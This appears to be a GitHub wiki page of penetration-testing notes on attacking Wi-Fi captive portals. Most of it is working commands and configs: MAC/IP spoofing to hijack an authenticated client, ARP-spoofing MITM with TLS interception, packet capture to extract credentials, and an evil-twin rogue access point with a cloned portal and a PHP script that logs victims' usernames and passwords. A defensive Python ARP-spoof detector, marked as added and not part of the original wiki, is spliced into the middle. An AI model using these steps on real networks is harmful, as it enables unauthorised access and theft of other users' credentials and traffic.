Wireless Captive Portals - CraigDonkin/Infrastructure GitHub Wiki
- Connect to Wi-Fi
- Get an IP from DHCP
- DNS hijack the user to the captive portal page
- The user authenticates (credentials, voucher, access code, payment, etc.)
- The user is then granted access
  - This could be a firewall rule change, the MAC being added to an allowlist, etc.
- Identify the gateway; this will likely correspond to the captive portal.
  ```
  route -n
  ```
- Check to see if ICMP traffic is allowed
  ```
  traceroute <ip>
  traceroute -p 443 <ip>
  traceroute -p 80 <ip>
  ```
- Scan the captive portal with nmap, nuclei, etc.
- MITM
- Credential phishing
- Bypassing
- Attacks on the portal
  - SQLi
  - XSS
- Impersonate an authenticated client
  - Put the interface into monitor mode
    ```
    airmon-ng start <interface>
    ```
  - Scan the network for the Wi-Fi AP and connected clients
    ```
    airodump-ng --bssid <MAC> <interface>
    ```
  - Identify the IP address belonging to the MAC address (prints each live IP followed by its MAC)
    ```
    nmap -v -n -sn <ip range> | awk '/is up/ {print up}; {gsub(/\(|\)/,""); up = $NF} /MAC Address:/ {print " => " $3}'
    ```
  - Switch the MAC address
    ```
    ifconfig <interface> down
    macchanger -m <mac> <interface>
    ifconfig <interface> up
    ```
  - Spoof the IP address (net-tools `route` takes `gw`, not the iproute2 `via`)
    ```
    ifconfig <interface> <ip> netmask <mask>
    route add default gw <default gw>
    ```
  - https://raw.githubusercontent.com/crishoj/hack-captive-portals/refs/heads/master/hack-captive.sh
- If UDP 53 has been left open for connectivity tests
  - Use dig to determine if DNS requests are allowed
    ```
    dig google.com +short
    ```
  - If the DNS request resolves to a private IP, the captive portal is intercepting traffic and handling DNS resolution.
  - Check to see if UDP 53 is open on the network gateway
    ```
    nmap -sU -sV -p 53 <ip>
    ```
  - Configure the OpenVPN client to establish a connection on UDP 53
- Conduct an ARP spoofing attack, MITM, and then:
  - Intercept traffic
  - DNS spoof
  - TLS downgrade
- Identify the assigned IP and MAC of the wireless adapter
- Scan the network to identify active clients
- Conduct the ARP spoofing attack (one direction per command: poison the client's view of the gateway, then the gateway's view of the client)
  ```
  arpspoof -i <interface> -t <client IP> <Gateway IP>
  arpspoof -i <interface> -t <Gateway IP> <client IP>
  ```
- Ettercap can also be used to do the attack
  - Select the interface, then click the checkmark icon
  - Click "Scan for hosts"
  - Click on the hosts list
  - Select SSL intercept from the MITM menu
  - Set the gateway as target 1
  - Initiate the ARP poisoning attack from the MITM menu
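A defender-side check for the ARP poisoning described above, added here as an example and not part of the original wiki: it walks a constructed list of ARP replies and flags the pattern the two arpspoof commands produce (one MAC answering for both the gateway IP and a client IP, and the gateway IP flipping between MACs), plus any gateway reply that disagrees with a pinned gateway MAC. The function name, sample replies and all MAC/IP values are constructed for this example.

```python
from collections import defaultdict

# Constructed sample of ARP replies seen on the segment: (seconds, sender IP, sender MAC).
# The entries at t=2 and t=4 mimic bidirectional arpspoof: one MAC claims the gateway
# address toward the client and the client address toward the gateway.
SAMPLE_ARP_REPLIES = [
    (0.0, "192.168.0.1",  "aa:bb:cc:00:00:01"),   # real gateway
    (0.5, "192.168.0.23", "aa:bb:cc:00:00:23"),   # real client
    (2.0, "192.168.0.1",  "DE:AD:BE:EF:00:99"),   # gateway IP claimed by another MAC
    (2.0, "192.168.0.23", "de:ad:be:ef:00:99"),   # client IP claimed by the same MAC
    (4.0, "192.168.0.1",  "de:ad:be:ef:00:99"),
    (4.0, "192.168.0.23", "de:ad:be:ef:00:99"),
    (6.0, "192.168.0.1",  "aa:bb:cc:00:00:01"),   # real gateway answers again
]

def detect_arp_spoof(replies, gateway_ip, known_gateway_mac=None):
    """Summarise IP/MAC conflicts in a sequence of ARP replies (hypothetical helper).

    gateway_macs: every MAC that has claimed gateway_ip
    suspect_macs: MACs that claimed gateway_ip and at least one other IP
    flips:        (time, ip, old_mac, new_mac) each time an IP changed owner
    bad_gateway:  (time, mac) gateway replies not matching the pinned known_gateway_mac
    """
    ip_to_macs = defaultdict(set)
    mac_to_ips = defaultdict(set)
    last_mac, flips, bad_gateway = {}, [], []
    pinned = known_gateway_mac.lower() if known_gateway_mac else None
    for ts, ip, mac in replies:
        mac = mac.lower()                      # normalise case before comparing
        ip_to_macs[ip].add(mac)
        mac_to_ips[mac].add(ip)
        if ip in last_mac and last_mac[ip] != mac:
            flips.append((ts, ip, last_mac[ip], mac))
        last_mac[ip] = mac
        if pinned and ip == gateway_ip and mac != pinned:
            bad_gateway.append((ts, mac))
    suspect = sorted(m for m, ips in mac_to_ips.items()
                     if gateway_ip in ips and len(ips) > 1)
    return {"gateway_macs": sorted(ip_to_macs[gateway_ip]),
            "suspect_macs": suspect, "flips": flips, "bad_gateway": bad_gateway}

if __name__ == "__main__":
    report = detect_arp_spoof(SAMPLE_ARP_REPLIES, "192.168.0.1", "aa:bb:cc:00:00:01")
    for key, value in report.items():
        print(f"{key}: {value}")
```

A static ARP entry for the gateway on sensitive hosts, or dynamic ARP inspection on the switch, is what makes the `bad_gateway` comparison enforceable rather than merely observable.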
- Enable monitor mode
  ```
  airmon-ng start <interface>
  ```
- Scan
  ```
  airodump-ng <interface>
  ```
- Identify the target network and note the BSSID MAC, then use airodump
  ```
  airodump-ng --bssid <mac> <interface> -w credcap
  airodump-ng --bssid <mac> <interface> -w sessioncap
  ```
- Load the capture in Wireshark and use filters to find credentials, session tokens,
- Enable Apache rewrite
  ```
  a2enmod rewrite
  ```
- Edit /etc/apache2/apache2.conf
  ```
  <Directory />
      Options FollowSymLinks
      AllowOverride All
      Require all denied
  </Directory>
  <Directory /var/www/>
      Options Indexes FollowSymLinks
      AllowOverride All
      Require all granted
  </Directory>
  ```
- Create .htaccess inside /var/www/html (any path that is not an existing file or directory is rewritten to index.html)
  ```
  RewriteEngine on
  RewriteCond %{REQUEST_FILENAME} !-d
  RewriteCond %{REQUEST_FILENAME} !-f
  RewriteRule . index.html [L]
  ```
- Restart Apache
  ```
  service apache2 restart
  ```
- Clone the captive portal
  ```
  httrack <url>
  ```
- Direct the form action to received.php
  ```html
  <form action="/received.php" method="POST" class="centered-form">
  ```
- received.php (the filename must match the form action's case on a case-sensitive filesystem):
  ```php
  <?php
  if (isset($_POST['submit'])) {
      $username = $_POST['username'];
      $password = $_POST['password'];
      $data = $username . ' ' . $password . "\r\n";
      $ret = file_put_contents('passes.lst', $data, FILE_APPEND | LOCK_EX);
      if ($ret === false) {
          die('An error has occurred');
      } else {
          echo "Thank you for signing in. You will be redirected shortly!";
      }
  } else {
      die('No post data to process');
  }
  ?>
  ```
- Store the fake portal in /var/www/html
- Configure DNS and DHCP for the rogue access point
  - dnsmasq dns.conf (`address=/#/` answers every name with the portal's own address):
    ```
    interface=wlan1
    dhcp-range=192.168.0.2,192.168.0.254,255.255.255.0,10h
    dhcp-option=3,192.168.0.1
    dhcp-option=6,192.168.0.1
    server=8.8.4.4
    server=8.8.8.8
    listen-address=127.0.0.1
    address=/#/192.168.0.1
    log-dhcp
    log-queries
    ```
  - Stop the system dnsmasq service and run dnsmasq directly with this config in the foreground (the `service` wrapper does not accept `-C`/`-d`):
    ```
    service dnsmasq stop
    dnsmasq -C dns.conf -d
    ```
- Assign a valid IP to the wireless interface
  ```
  ifconfig <interface> <ip>/24
  ```
- Ensure IP forwarding is enabled
  ```
  sh -c 'echo 1 > /proc/sys/net/ipv4/ip_forward'
  ```
- Set up the access point
  - Create hostapd.conf
    ```
    interface=wlan1
    driver=nl80211
    ssid=<SSID>
    hw_mode=g
    channel=1
    auth_algs=1
    bssid=<MAC address>
    ```
  - Launch the AP:
    ```
    hostapd hostapd.conf
    ```
- Wait for clients to connect, or run a deauth attack.